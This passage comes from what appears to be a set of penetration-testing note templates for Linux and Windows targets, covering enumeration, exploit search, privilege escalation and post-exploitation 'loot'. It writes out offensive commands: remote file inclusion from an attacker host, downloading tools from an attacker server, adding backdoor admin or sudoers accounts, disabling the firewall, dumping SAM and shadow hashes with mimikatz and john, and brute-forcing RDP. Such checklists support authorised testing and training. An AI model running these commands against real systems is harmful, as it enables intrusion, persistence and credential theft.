378 | ### Port 443 - HTTPS 379 | 380 | Heartbleed: 381 | 382 | ``` 383 | # Heartbleed 384 | sslscan INSERTIPADDRESS:443 385 | ``` 386 | 387 | ## Vulnerability analysis 388 | 389 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features. 390 | 391 | ### To try - List of possibilies 392 | Add possible exploits here: 393 | 394 | 395 | 396 | ### Find sploits - Searchsploit and google 397 | 398 | Where there are many exploits for a software, use google. It will automatically sort it by popularity. 399 | 400 | ``` 401 | site:exploit-db.com apache 2.4.7 402 | 403 | # Remove dos-exploits 404 | 405 | searchsploit Apache 2.4.7 | grep -v '/dos/' 406 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" 407 | 408 | # Only search the title (exclude the path), add the -t 409 | searchsploit -t Apache | grep -v '/dos/' 410 | ``` 411 | 412 | 413 | 414 | ---------------------------------------------------------------------------- 415 | 416 | 417 | 418 | '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' 419 | 420 | 421 | 422 | ----------------------------------------------------------------------------- 423 | 424 | 425 | 426 | ## Privilege escalation 427 | 428 | Now we start the whole enumeration-process over gain. 429 | 430 | - Kernel exploits 431 | - Programs running as root 432 | - Installed software 433 | - Weak/reused/plaintext passwords 434 | - Inside service 435 | - Suid misconfiguration 436 | - World writable scripts invoked by root 437 | - Unmounted filesystems 438 | 439 | Less likely 440 | 441 | - Private ssh keys 442 | - Bad path configuration 443 | - Cronjobs 444 | 445 | 446 | ### To-try list 447 | 448 | Here you will add all possible leads. What to try. 449 | 450 | 451 | ### Useful commands 452 | 453 | ``` 454 | # Spawning shell 455 | python -c 'import pty; pty.spawn("/bin/sh")' 456 | 457 | # Access to more binaries 458 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 459 | 460 | # Set up webserver 461 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080 462 | 463 | # Download all files 464 | wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check 465 | 466 | ./LinEnum.sh -t -k password -r LinEnum.txt 467 | python linprivchecker.py extended 468 | ./unix-privesc-check standard 469 | 470 | 471 | # Writable directories 472 | /tmp 473 | /var/tmp 474 | 475 | 476 | # Add user to sudoers 477 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers 478 | ``` 479 | 480 | 481 | ### Basic info 482 | 483 | - OS: 484 | - Version: 485 | - Kernel version: 486 | - Architecture: 487 | - Current user: 488 | 489 | **Devtools:** 490 | - GCC: 491 | - NC: 492 | - WGET: 493 | 494 | **Users with login:** 495 | 496 | ``` 497 | uname -a 498 | env 499 | id 500 | cat /proc/version 501 | cat /etc/issue 502 | cat /etc/passwd 503 | cat /etc/group 504 | cat /etc/shadow 505 | cat /etc/hosts 506 | 507 | # Users with login 508 | grep -vE "nologin" /etc/passwd 509 | 510 | # Priv Enumeration Scripts 511 | 512 | 513 | upload /unix-privesc-check 514 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./ 515 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./ 516 | 517 | python linprivchecker.py extended 518 | ./LinEnum.sh -t -k password 519 | unix-privesc-check 520 | ``` 521 | 522 | ### Kernel exploits 523 | 524 | ``` 525 | site:exploit-db.com kernel version 526 | 527 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6 528 | 529 | python linprivchecker.py extended 530 | ``` 531 | 532 | ### Programs running as root 533 | 534 | Look for webserver, mysql or anything else like that. 535 | 536 | ``` 537 | # Metasploit 538 | ps 539 | 540 | # Linux 541 | ps aux 542 | ``` 543 | 544 | ### Installed software 545 | 546 | ``` 547 | /usr/local/ 548 | /usr/local/src 549 | /usr/local/bin 550 | /opt/ 551 | /home 552 | /var/ 553 | /usr/src/ 554 | 555 | # Debian 556 | dpkg -l 557 | 558 | # CentOS, OpenSuse, Fedora, RHEL 559 | rpm -qa (CentOS / openSUSE ) 560 | 561 | # OpenBSD, FreeBSD 562 | pkg_info 563 | ``` 564 | 565 | 566 | ### Weak/reused/plaintext passwords 567 | 568 | - Check database config-file 569 | - Check databases 570 | - Check weak passwords 571 | 572 | ``` 573 | username:username 574 | username:username1 575 | username:root 576 | username:admin 577 | username:qwerty 578 | username:password 579 | ``` 580 | 581 | - Check plaintext 582 | 583 | ``` 584 | ./LinEnum.sh -t -k password 585 | ``` 586 | 587 | ### Inside service 588 | 589 | ``` 590 | # Linux 591 | netstat -anlp 592 | netstat -ano 593 | ``` 594 | 595 | ### Suid misconfiguration 596 | 597 | Binary with suid permission can be run by anyone, but when they are run they are run as root! 598 | 599 | Example programs: 600 | 601 | ``` 602 | nmap 603 | vim 604 | nano 605 | ``` 606 | 607 | ``` 608 | find / -perm -u=s -type f 2>/dev/null 609 | ``` 610 | 611 | 612 | ### Unmounted filesystems 613 | 614 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again. 615 | 616 | ``` 617 | mount -l 618 | ``` 619 | 620 | ### Cronjob 621 | 622 | Look for anything that is owned by privileged user but writable for you 623 | 624 | ``` 625 | crontab -l 626 | ls -alh /var/spool/cron 627 | ls -al /etc/ | grep cron 628 | ls -al /etc/cron* 629 | cat /etc/cron* 630 | cat /etc/at.allow 631 | cat /etc/at.deny 632 | cat /etc/cron.allow 633 | cat /etc/cron.deny 634 | cat /etc/crontab 635 | cat /etc/anacrontab 636 | cat /var/spool/cron/crontabs/root 637 | ``` 638 | 639 | ### SSH Keys 640 | 641 | Check all home directories 642 | 643 | ``` 644 | cat ~/.ssh/authorized_keys 645 | cat ~/.ssh/identity.pub 646 | cat ~/.ssh/identity 647 | cat ~/.ssh/id_rsa.pub 648 | cat ~/.ssh/id_rsa 649 | cat ~/.ssh/id_dsa.pub 650 | cat ~/.ssh/id_dsa 651 | cat /etc/ssh/ssh_config 652 | cat /etc/ssh/sshd_config 653 | cat /etc/ssh/ssh_host_dsa_key.pub 654 | cat /etc/ssh/ssh_host_dsa_key 655 | cat /etc/ssh/ssh_host_rsa_key.pub 656 | cat /etc/ssh/ssh_host_rsa_key 657 | cat /etc/ssh/ssh_host_key.pub 658 | cat /etc/ssh/ssh_host_key 659 | ``` 660 | 661 | 662 | ### Bad path configuration 663 | 664 | Require user interaction 665 | 666 | 667 | 668 | 669 | 670 | ------------------------------------------------------------------------ 671 | 672 | 673 | 674 | 675 | ----------------------------- LOOT LOOT LOOT LOOT ---------------------- 676 | 677 | 678 | 679 | 680 | ------------------------------------------------------------------------ 681 | 682 | 683 | ## Loot 684 | 685 | **Checklist** 686 | 687 | - Proof: 688 | - Network secret: 689 | - Passwords and hashes: 690 | - Dualhomed: 691 | - Tcpdump: 692 | - Interesting files: 693 | - Databases: 694 | - SSH-keys: 695 | - Browser: 696 | - Mail: 697 | 698 | 699 | ### Proof 700 | 701 | ``` 702 | /root/proof.txt 703 | ``` 704 | 705 | ### Network secret 706 | 707 | ``` 708 | /root/network-secret.txt 709 | ``` 710 | 711 | ### Passwords and hashes 712 | 713 | ``` 714 | cat /etc/passwd 715 | cat /etc/shadow 716 | 717 | unshadow passwd shadow > unshadowed.txt 718 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 719 | ``` 720 | 721 | ### Dualhomed 722 | 723 | ``` 724 | ifconfig 725 | ifconfig -a 726 | arp -a 727 | ``` 728 | 729 | ### Tcpdump 730 | 731 | ``` 732 | tcpdump -i any -s0 -w capture.pcap 733 | tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X 734 | tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X 735 | ``` 736 | 737 | ### Interesting files 738 | 739 | ``` 740 | #Meterpreter 741 | search -f *.txt 742 | search -f *.zip 743 | search -f *.doc 744 | search -f *.xls 745 | search -f config* 746 | search -f *.rar 747 | search -f *.docx 748 | search -f *.sql 749 | 750 | .ssh: 751 | .bash_history 752 | ``` 753 | 754 | ### Databases 755 | 756 | ### SSH-Keys 757 | 758 | ### Browser 759 | 760 | ### Mail 761 | 762 | ``` 763 | /var/mail 764 | /var/spool/mail 765 | ``` 766 | 767 | ### GUI 768 | If there is a gui we want to check out the browser. 769 | 770 | ``` 771 | echo $DESKTOP_SESSION 772 | echo $XDG_CURRENT_DESKTOP 773 | echo $GDMSESSION 774 | ``` 775 | 776 | ## How to replicate: 777 | -------------------------------------------------------------------------------- /templates/windows-template.md: -------------------------------------------------------------------------------- 1 | ## Info-sheet 2 | 3 | 4 | - DNS-Domain name: 5 | - Host name: 6 | - OS: 7 | - Server: 8 | - Workgroup: 9 | - Windows domain: 10 | - Services and ports: 11 | 12 | INSERTTCPSCAN 13 | 14 | 15 | ## Recon 16 | 17 | ``` 18 | Always start with a stealthy scan to avoid closing ports. 19 | 20 | # Syn-scan 21 | nmap -sS INSERTIPADDRESS 22 | 23 | # Service-version, default scripts, OS: 24 | nmap INSERTIPADDRESS -sV -sC -O 25 | 26 | # Scan all ports, might take a while. 27 | nmap INSERTIPADDRESS -p- 28 | 29 | # Scan for UDP 30 | nmap INSERTIPADDRESS -sU 31 | unicornscan -mU -v -I INSERTIPADDRESS 32 | 33 | # Connect to udp if one is open 34 | nc -u INSERTIPADDRESS 48772 35 | 36 | # Monster scan 37 | nmap INSERTIPADDRESS -p- -A -T4 -sC 38 | ``` 39 | 40 | 41 | ### Port 21 - FTP 42 | 43 | - Name: 44 | - Version: 45 | - Anonymous login: 46 | 47 | INSERTFTPTEST 48 | 49 | ``` 50 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS 51 | ``` 52 | 53 | ### Port 22 - SSH 54 | 55 | - Name: 56 | - Version: 57 | - Protocol: 58 | - RSA-key-fingerprint: 59 | - Takes-password: 60 | If you have usernames test login with username:username 61 | 62 | INSERTSSHCONNECT 63 | 64 | 65 | ### Port 25 66 | 67 | - Name: 68 | - Version: 69 | - VRFY: 70 | - EXPN: 71 | 72 | INSERTSMTPCONNECT 73 | 74 | ``` 75 | nc -nvv INSERTIPADDRESS 25 76 | HELO foo 77 | 78 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS 79 | ``` 80 | 81 | ### Port 110 - Pop3 82 | 83 | - Name: 84 | - Version: 85 | 86 | INSERTPOP3CONNECT 87 | 88 | ### Port 135 - MSRPC 89 | 90 | Some versions are vulnerable. 91 | 92 | ``` 93 | nmap INSERTIPADDRESS --script=msrpc-enum 94 | ``` 95 | 96 | Exploit: 97 | 98 | ``` 99 | msf > use exploit/windows/dcerpc/ms03_026_dcom 100 | ``` 101 | 102 | ### Port 139/445 - SMB 103 | 104 | - Name: 105 | - Version: 106 | - Domain/workgroup name: 107 | - Domain-sid: 108 | - Allows unauthenticated login: 109 | 110 | 111 | ``` 112 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 113 | 114 | enum4linux -a INSERTIPADDRESS 115 | 116 | rpcclient -U "" INSERTIPADDRESS 117 | srvinfo 118 | enumdomusers 119 | getdompwinfo 120 | querydominfo 121 | netshareenum 122 | netshareenumall 123 | 124 | smbclient -L INSERTIPADDRESS 125 | smbclient //INSERTIPADDRESS/tmp 126 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john 127 | smbclient //INSERTIPADDRESS/ipc$ -U john 128 | smbclient //INSERTIPADDRESS/admin$ -U john 129 | 130 | Log in with shell: 131 | winexe -U username //INSERTIPADDRESS "cmd.exe" --system 132 | 133 | ``` 134 | 135 | ### Port 161/162 UDP - SNMP 136 | 137 | 138 | ``` 139 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS 140 | snmp-check -t INSERTIPADDRESS -c public 141 | ``` 142 | 143 | ``` 144 | # Common community strings 145 | public 146 | private 147 | community 148 | ``` 149 | 150 | 151 | 152 | ### Port 554 - RTSP 153 | 154 | 155 | ### Port 1030/1032/1033/1038 156 | 157 | Used by RPC to connect in domain network. Usually nothing. 158 | 159 | ### Port 1433 - MSSQL 160 | 161 | - Version: 162 | 163 | ``` 164 | use auxiliary/scanner/mssql/mssql_ping 165 | 166 | # Last options. Brute force. 167 | scanner/mssql/mssql_login 168 | 169 | # Log in to mssql 170 | sqsh -S INSERTIPADDRESS -U sa 171 | 172 | # Execute commands 173 | xp_cmdshell 'date' 174 | go 175 | ``` 176 | 177 | If you have credentials look in metasploit for other modules. 178 | 179 | ## Port 1521 - Oracle 180 | 181 | Name: 182 | Version: 183 | Password protected: 184 | 185 | ``` 186 | tnscmd10g version -h INSERTIPADDRESS 187 | tnscmd10g status -h INSERTIPADDRESS 188 | ``` 189 | 190 | 191 | ### Port 2100 - Oracle XML DB 192 | 193 | Can be accessed through ftp. 194 | Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 195 | - Name: 196 | - Version: 197 | 198 | Default logins: 199 | 200 | ``` 201 | sys:sys 202 | scott:tiger 203 | ``` 204 | 205 | ### Port 2049 - NFS 206 | 207 | ``` 208 | showmount -e INSERTIPADDRESS 209 | 210 | If you find anything you can mount it like this: 211 | 212 | mount INSERTIPADDRESS:/ /tmp/NFS 213 | mount -t INSERTIPADDRESS:/ /tmp/NFS 214 | ``` 215 | 216 | ### 3306 - MySQL 217 | 218 | - Name: 219 | - Version: 220 | 221 | ``` 222 | mysql --host=INSERTIPADDRESS -u root -p 223 | 224 | nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306 225 | ``` 226 | 227 | ### Port 3339 - Oracle web interface 228 | 229 | - Basic info about web service (apache, nginx, IIS) 230 | - Server: 231 | - Scripting language: 232 | - Apache Modules: 233 | - IP-address: 234 | - Domain-name address: 235 | 236 | ### Port 3389 - Remote desktop 237 | 238 | Test logging in to see what OS is running 239 | 240 | ``` 241 | rdesktop -u guest -p guest INSERTIPADDRESS -g 94% 242 | 243 | # Brute force 244 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS 245 | ``` 246 | 247 | 248 | ### Port 80 249 | 250 | - Server: 251 | - Scripting language: 252 | - Apache Modules: 253 | - Domain-name address: 254 | 255 | INSERTCURLHEADER 256 | 257 | 258 | - Web application 259 | - Name: 260 | - Version: 261 | 262 | ``` 263 | # Nikto 264 | nikto -h http://INSERTIPADDRESS 265 | 266 | # Nikto with squid proxy 267 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 268 | 269 | # Get header 270 | curl -i INSERTIPADDRESS 271 | 272 | # Get everything 273 | curl -i -L INSERTIPADDRESS 274 | 275 | # Check if it is possible to upload using put 276 | curl -v -X OPTIONS http://INSERTIPADDRESS/ 277 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php 278 | 279 | # Check for title and all links 280 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix 281 | ``` 282 | 283 | 284 | #### Nikto scan 285 | 286 | 287 | INSERTNIKTOSCAN 288 | 289 | 290 | 291 | #### Url brute force 292 | 293 | 294 | 295 | ``` 296 | # Dirb 297 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt 298 | 299 | # Gobuster - remove relevant responde codes (403 for example) 300 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 301 | ``` 302 | 303 | INSERTDIRBSCAN 304 | 305 | 306 | #### Default/Weak login 307 | 308 | Google documentation for default passwords and test them: 309 | 310 | ``` 311 | site:webapplication.com password 312 | ``` 313 | 314 | ``` 315 | admin admin 316 | admin password 317 | admin 318 | admin nameofservice 319 | root root 320 | root admin 321 | root password 322 | root nameofservice 323 | password 324 | admin 325 | username 326 | nameofservice 327 | ``` 328 | 329 | #### LFI/RFI 330 | 331 | ``` 332 | # Kadimus 333 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= 334 | 335 | 336 | # Bypass execution 337 | http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index 338 | base64 -d savefile.php 339 | 340 | # Bypass extension 341 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00 342 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt? 343 | ``` 344 | 345 | 346 | #### SQL-Injection 347 | 348 | ``` 349 | # Post 350 | ./sqlmap.py -r search-test.txt -p tfUPass 351 | 352 | # Get 353 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql 354 | 355 | # Crawl 356 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 357 | ``` 358 | 359 | #### Sql-login-bypass 360 | 361 | 362 | - Open Burp-suite 363 | - Make and intercept request 364 | - Send to intruder 365 | - Cluster attack 366 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) 367 | - Attack 368 | - Check for response length variation 369 | 370 | ### Password brute force - last resort 371 | 372 | ``` 373 | cewl 374 | ``` 375 | 376 | ### Port 443 - HTTPS 377 | 378 | Heartbleed: 379 | 380 | ``` 381 | sslscan INSERTIPADDRESS:443 382 | ``` 383 | 384 | ## Vulnerability analysis 385 | 386 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features. 387 | 388 | ### To try - List of possibilities 389 | Add possible exploits here: 390 | 391 | 392 | ### Find sploits - Searchsploit and google 393 | 394 | Where there are many exploits for a software, use google. It will automatically sort it by popularity. 395 | 396 | ``` 397 | site:exploit-db.com apache 2.4.7 398 | 399 | # Remove dos-exploits 400 | 401 | searchsploit Apache 2.4.7 | grep -v '/dos/' 402 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" 403 | 404 | # Only search the title (exclude the path), add the -t 405 | searchsploit -t Apache | grep -v '/dos/' 406 | ``` 407 | 408 | 409 | 410 | ---------------------------------------------------------------------------- 411 | 412 | 413 | 414 | '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' 415 | 416 | 417 | 418 | ----------------------------------------------------------------------------- 419 | 420 | 421 | ## Privilege escalation 422 | 423 | Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order. 424 | 425 | - Kernel exploits 426 | - Cleartext password 427 | - Reconfigure service parameters 428 | - Inside service 429 | - Program running as root 430 | - Installed software 431 | - Scheduled tasks 432 | - Weak passwords 433 | 434 | 435 | 436 | ### To-try list 437 | Here you will add all possible leads. What to try. 438 | 439 | 440 | ### Basic info 441 | 442 | - OS: 443 | - Version: 444 | - Architecture: 445 | - Current user: 446 | - Hotfixes: 447 | - Antivirus: 448 | 449 | **Users:** 450 | 451 | **Localgroups:** 452 | 453 | ``` 454 | systeminfo 455 | set 456 | hostname 457 | net users 458 | net user user1 459 | net localgroups 460 | accesschk.exe -uwcqv "Authenticated Users" * 461 | 462 | netsh firewall show state 463 | netsh firewall show config 464 | 465 | # Set path 466 | set PATH=%PATH%;C:\xampp\php 467 | ``` 468 | 469 | 470 | ### Kernel exploits 471 | 472 | 473 | ``` 474 | # Look for hotfixes 475 | systeminfo 476 | 477 | wmic qfe get Caption,Description,HotFixID,InstalledOn 478 | 479 | # Search for exploits 480 | site:exploit-db.com windows XX XX 481 | ``` 482 | 483 | 484 | ### Cleartext passwords 485 | 486 | ``` 487 | # Windows autologin 488 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 489 | 490 | # VNC 491 | reg query "HKCU\Software\ORL\WinVNC3\Password" 492 | 493 | # SNMP Parameters 494 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 495 | 496 | # Putty 497 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 498 | 499 | # Search for password in registry 500 | reg query HKLM /f password /t REG_SZ /s 501 | reg query HKCU /f password /t REG_SZ /s 502 | ``` 503 | 504 | 505 | ### Reconfigure service parameters 506 | 507 | - Unquoted service paths 508 | 509 | Check book for instructions 510 | 511 | - Weak service permissions 512 | 513 | Check book for instructions 514 | 515 | ### Inside service 516 | 517 | Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside. 518 | 519 | ``` 520 | # Meterpreter 521 | run get_local_subnets 522 | 523 | netstat /a 524 | netstat -ano 525 | ``` 526 | 527 | ### Programs running as root/system 528 | 529 | 530 | 531 | ### Installed software 532 | 533 | ``` 534 | # Metasploit 535 | ps 536 | 537 | tasklist /SVC 538 | net start 539 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 540 | DRIVERQUERY 541 | 542 | Look in: 543 | C:\Program files 544 | C:\Program files (x86) 545 | Home directory of the user 546 | ``` 547 | 548 | 549 | ### Scheduled tasks 550 | 551 | ``` 552 | schtasks /query /fo LIST /v 553 | 554 | Check this file: 555 | c:\WINDOWS\SchedLgU.Txt 556 | ``` 557 | 558 | ### Weak passwords 559 | 560 | Remote desktop 561 | 562 | ``` 563 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS 564 | ``` 565 | 566 | ### Useful commands 567 | 568 | 569 | **Add user and enable RDP** 570 | 571 | ``` 572 | net user haxxor Haxxor123 /add 573 | net localgroup Administrators haxxor /add 574 | net localgroup "Remote Desktop Users" haxxor /ADD 575 | 576 | # Enable RDP 577 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 578 | 579 | Turn firewall off 580 | netsh firewall set opmode disable 581 | 582 | Or like this 583 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 584 | 585 | If you get this error: 586 | 587 | "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ? 588 | Failed to connect, CredSSP required by server."" 589 | 590 | Add this reg key: 591 | 592 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 593 | ``` 594 | 595 | 596 | 597 | ------------------------------------------------------------------------ 598 | 599 | 600 | 601 | 602 | ----------------------------- LOOT LOOT LOOT LOOT ------------------- 603 | 604 | 605 | 606 | 607 | ------------------------------------------------------------------------ 608 | 609 | 610 | ## Loot 611 | 612 | - Proof: 613 | - Network secret: 614 | - Password and hashes: 615 | - Dualhomed: 616 | - Tcpdump: 617 | - Interesting files: 618 | - Databases: 619 | - SSH-keys: 620 | - Browser: 621 | 622 | ### Proof 623 | 624 | ### Network secret 625 | 626 | ### Passwords and hashes 627 | 628 | ``` 629 | wce32.exe -w 630 | wce64.exe -w 631 | fgdump.exe 632 | 633 | reg.exe save hklm\sam c:\sam_backup 634 | reg.exe save hklm\security c:\security_backup 635 | reg.exe save hklm\system c:\system 636 | 637 | # Meterpreter 638 | hashdump 639 | load mimikatz 640 | msv 641 | ``` 642 | 643 | ### Dualhomed 644 | 645 | ``` 646 | ipconfig /all 647 | route print 648 | 649 | # What other machines have been connected 650 | arp -a 651 | ``` 652 | 653 | ### Tcpdump 654 | 655 | ``` 656 | # Meterpreter 657 | run packetrecorder -li 658 | run packetrecorder -i 1 659 | ``` 660 | 661 | ### Interesting files 662 | 663 | ``` 664 | #Meterpreter 665 | search -f *.txt 666 | search -f *.zip 667 | search -f *.doc 668 | search -f *.xls 669 | search -f config* 670 | search -f *.rar 671 | search -f *.docx 672 | search -f *.sql 673 | 674 | # How to cat files in meterpreter 675 | cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt 676 | 677 | # Recursive search 678 | dir /s 679 | ``` 680 | 681 | ### Mail 682 | 683 | ### Browser 684 | 685 | - Browser start-page: 686 | - Browser-history: 687 | - Saved passwords: 688 | 689 | ### Databases 690 | 691 | ### SSH-keys 692 | 693 | ## How to replicate: 694 | --------------------------------------------------------------------------------